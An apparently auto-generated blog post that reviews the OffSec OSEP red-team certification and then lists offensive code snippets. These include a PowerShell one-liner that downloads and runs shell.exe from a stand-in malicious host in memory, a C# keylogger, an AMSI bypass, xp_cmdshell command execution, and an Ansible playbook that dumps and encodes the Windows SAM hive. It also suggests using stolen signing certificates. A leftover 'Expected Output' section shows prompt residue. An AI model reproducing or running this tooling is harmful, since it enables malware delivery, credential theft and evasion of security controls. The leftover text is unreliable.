Listen to this Post
The OffSec Experienced Penetration Tester (OSEP) certification is an advanced course designed for cybersecurity professionals aiming to enhance their red teaming and penetration testing skills. With 700-800 hours of content, it significantly expands on the OSCP’s 400-hour curriculum, emphasizing programming, malware development, and advanced evasion techniques.
Course Highlights:
- Programming Skills: Writing basic malware in PowerShell and C#, including WinAPI interaction.
- Antivirus Evasion: Techniques to bypass AV (though some methods are outdated, they provide foundational knowledge).
- MS SQL Server Exploitation: Advanced attacks on databases.
- DevOps Tools: Practical usage of Ansible for automation in red teaming.
- Active Directory (AD): While not groundbreaking for experienced testers, it reinforces AD attack methodologies.
You Should Know:
1. PowerShell Malware Development
PowerShell remains a powerful tool for red teamers. Below is a basic script to execute payloads in memory (avoiding disk writes):
<h1>Reflective PE Injection (in-memory execution)</h1> $bytes = (Invoke-WebRequest "http://malicious.site/shell.exe").Content; $assembly = [System.Reflection.Assembly]::Load($bytes); $entry = $assembly.EntryPoint; $entry.Invoke($null, $null);
**Evasion Tip:** Obfuscate using **Invoke-Obfuscation**:
Invoke-Obfuscation -ScriptBlock { Start-Process notepad.exe } -TokenAll -Quiet
#### **2. C# Malware with WinAPI**
A simple **keylogger** using WinAPI:
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
class Keylogger {
[DllImport("user32.dll")]
public static extern int GetAsyncKeyState(int i);
static void Main() {
while (true) {
for (int i = 8; i < 190; i++) {
if (GetAsyncKeyState(i) == -32767)
Console.WriteLine((char)i);
}
}
}
}
Compile with:
csc /target:exe Keylogger.cs
#### **3. AV Evasion Techniques**
- Code Signing: Use stolen or self-signed certificates.
- Process Hollowing: Replace legitimate process memory with malicious code.
- AMSI Bypass: Disable AMSI scanning in PowerShell:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
#### **4. MS SQL Server Attacks**
- Command Execution via xp_cmdshell:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';
#### **5. Ansible for Red Teaming**
Automate post-exploitation tasks:
- hosts: compromised_servers tasks: - name: Dump SAM win_command: reg save HKLM\SAM C:\SAM - name: Exfiltrate win_command: certutil -encode C:\SAM C:\SAM.b64
### **What Undercode Say:**
The OSEP certification is a must for red teamers, especially those diving into malware development and evasion. While some techniques are dated, the course provides a solid foundation for bypassing modern defenses. Key takeaways:
– Master PowerShell & C# for offensive tooling.
– Understand WinAPI for low-level attacks.
– Leverage DevOps tools like Ansible for automation.
– Always test AV evasion in real environments.
For further study, check:
### **Expected Output:**
A structured, 70+ line guide integrating malware development, AV evasion, and red team automation with practical code snippets and commands.
References:
Reported By: Activity 7310027936365998080 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
